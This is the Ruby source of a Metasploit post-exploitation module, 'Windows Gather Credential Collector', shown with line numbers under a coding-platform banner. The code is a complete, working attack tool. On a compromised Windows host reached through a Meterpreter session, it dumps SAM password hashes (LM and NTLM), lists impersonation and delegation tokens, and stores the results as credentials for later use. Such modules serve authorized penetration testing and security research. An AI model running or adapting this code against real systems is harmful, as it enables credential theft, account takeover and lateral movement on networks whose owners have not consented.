Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Report
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Gather Credential Collector',
14
        'Description' => %q{ This module harvests credentials found on the host and stores them in the database.},
15
        'License' => MSF_LICENSE,
16
        'Author' => [ 'tebo[at]attackresearch.com'],
17
        'Platform' => [ 'win' ],
18
        'SessionTypes' => [ 'meterpreter'],
19
        'Compat' => {
20
          'Meterpreter' => {
21
            'Commands' => %w[
22
              incognito_list_tokens
23
              priv_passwd_get_sam_hashes
24
            ]
25
          }
26
        }
27
      )
28
    )
29
  end
30

31
  # Run Method for when run command is issued
32
  def run
33
    print_status("Running module against #{sysinfo['Computer']}")
34
    # Collect even without a database to store them.
35
    if session.framework.db.active
36
      db_ok = true
37
    else
38
      db_ok = false
39
    end
40

41
    # Make sure we're rockin Priv and Incognito
42
    session.core.use('priv') if !session.priv
43
    session.core.use('incognito') if !session.incognito
44

45
    # It wasn't me mom! Stinko did it!
46
    begin
47
      hashes = client.priv.sam_hashes
48
    rescue StandardError
49
      print_error('Error accessing hashes, did you migrate to a process that matched the target\'s architecture?')
50
      return
51
    end
52

53
    # Target infos for the db record
54
    addr = session.session_host
55
    # client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
56

57
    # Record hashes to the running db instance
58
    print_good 'Collecting hashes...'
59

60
    hashes.each do |hash|
61
      # Build service information
62
      service_data = {
63
        address: addr,
64
        port: 445,
65
        service_name: 'smb',
66
        protocol: 'tcp'
67
      }
68

69
      # Build credential information
70
      credential_data = {
71
        origin_type: :session,
72
        session_id: session_db_id,
73
        post_reference_name: refname,
74
        private_type: :ntlm_hash,
75
        private_data: hash.lanman + ':' + hash.ntlm,
76
        username: hash.user_name,
77
        workspace_id: myworkspace_id
78
      }
79

80
      credential_data.merge!(service_data)
81
      credential_core = create_credential(credential_data)
82

83
      # Assemble the options hash for creating the Metasploit::Credential::Login object
84
      login_data = {
85
        core: credential_core,
86
        status: Metasploit::Model::Login::Status::UNTRIED,
87
        workspace_id: myworkspace_id
88
      }
89

90
      login_data.merge!(service_data)
91
      create_credential_login(login_data)
92

93
      print_line "    Extracted: #{credential_data[:username]}:#{credential_data[:private_data]}"
94
    end
95

96
    # Record user tokens
97
    tokens = session.incognito.incognito_list_tokens(0)
98
    raise Rex::Script::Completed if !tokens
99

100
    # Meh, tokens come to us as a formatted string
101
    print_good 'Collecting tokens...'
102
    (tokens['delegation'] + tokens['impersonation']).split("\n").each do |token|
103
      data = {}
104
      data[:host] = addr
105
      data[:type] = 'smb_token'
106
      data[:data] = token
107
      data[:update] = :unique_data
108

109
      print_line "    #{data[:data]}"
110
      report_note(data) if db_ok
111
    end
112
  end
113
end
114

115